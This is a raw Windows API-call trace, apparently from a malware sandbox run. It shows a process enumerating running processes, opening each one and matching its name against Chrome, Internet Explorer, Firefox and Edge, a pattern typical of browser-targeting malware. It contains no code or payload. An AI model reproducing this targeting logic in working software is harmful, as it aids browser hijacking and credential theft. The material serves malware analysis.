	[0252.925] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.925] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0252.925] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.925] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.926] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0252.927] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0xa780
	[0252.927] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.927] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0252.927] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.927] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.928] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.928] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0252.928] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.928] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.929] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0252.932] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0xa784
	[0252.932] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.932] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0252.932] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.932] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.933] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.933] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0252.933] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.933] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.934] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0252.935] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0xa788
	[0252.935] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.935] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0252.936] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.936] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.936] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.936] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0252.936] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.936] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.937] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0252.938] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0xa78c
	[0252.938] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.938] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0252.939] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.939] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.939] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.939] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0252.940] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.940] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.940] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0252.941] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0xa790
	[0252.941] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.941] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0252.942] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.942] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.942] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.942] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0252.943] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.943] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.943] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0252.944] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0xa794
	[0252.944] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.944] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0252.945] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.945] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.945] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.945] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0252.946] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.946] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.946] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0252.947] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0xa798
	[0252.947] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.947] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0252.948] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.948] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.948] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.948] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0252.949] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.949] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.949] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0252.950] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0xa79c
	[0252.950] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.950] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0252.951] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.951] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.951] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.951] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0252.952] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.952] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.952] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0252.953] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0xa7a0
	[0252.953] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.954] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0252.954] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.954] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.955] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.955] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0252.955] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.955] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.956] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0252.957] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0xa7a4
	[0252.957] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.957] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0252.957] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.957] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.958] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.958] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0252.958] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.958] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.958] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0252.959] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0xa7a8
	[0252.959] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.959] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0252.959] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.960] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.960] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.960] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0252.960] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.960] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.960] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0252.961] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0xa7ac
	[0252.961] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.961] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0252.961] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.961] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.962] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.962] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0252.962] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.962] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.962] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0252.963] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0xa7b0
	[0252.963] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.963] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0252.963] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.963] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.964] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.964] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0252.964] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.964] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.964] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0252.965] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0252.965] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0252.966] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0xa7b4
	[0252.966] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.966] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0252.967] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.967] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.967] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.967] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0252.968] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.968] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.969] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0252.970] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0xa7b8
	[0252.970] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.970] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0252.971] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.971] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.971] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.971] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0252.971] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.971] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.971] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0252.972] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0xa7bc
	[0252.972] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.972] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0252.973] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.973] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.973] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.973] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0252.973] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.973] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.973] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0252.974] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0xa7c0
	[0252.974] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.974] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0252.975] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.975] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.975] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.975] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0252.975] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.975] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.976] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0252.977] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0xa7c4
	[0252.977] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.977] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0252.977] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.977] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.978] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.978] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0252.978] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.978] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.979] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0252.979] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0xa7c8
	[0252.980] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.980] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0252.980] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.980] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.980] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.980] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0252.980] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.980] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.981] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0252.981] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0xa7cc
	[0252.981] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.982] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0252.982] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.982] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.982] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.982] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0252.983] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.983] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.983] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0252.984] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0xa7d0
	[0252.984] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.984] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0252.985] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.985] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.985] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.985] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0252.985] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.985] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.986] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0252.987] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0xa7d4
	[0252.987] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.987] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0252.987] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.987] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.987] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.988] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0252.988] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.988] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.988] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb20, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beam.exe")) returned 1
	[0252.989] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb20) returned 0xa7d8
	[0252.989] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.989] StrStrIA (lpFirst="beam.exe", lpSrch="chrome.exe") returned 0x0
	[0252.989] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.989] StrStrIA (lpFirst="beam.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.989] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.989] StrStrIA (lpFirst="beam.exe", lpSrch="firefox.exe") returned 0x0
	[0252.990] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.990] StrStrIA (lpFirst="beam.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0252.990] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb30, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="configurations.exe")) returned 1
	[0252.991] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb30) returned 0xa7dc
	[0252.991] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.991] StrStrIA (lpFirst="configurations.exe", lpSrch="chrome.exe") returned 0x0
	[0252.991] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.991] StrStrIA (lpFirst="configurations.exe", lpSrch="iexplore.exe") returned 0x0
	[0252.992] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.992] StrStrIA (lpFirst="configurations.exe", lpSrch="firefox.exe") returned 0x0
	[0252.992] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0252.992] StrStrIA (lpFirst="configurations.exe", lpSrch="microsoftedgecp.exe") returned 0x0
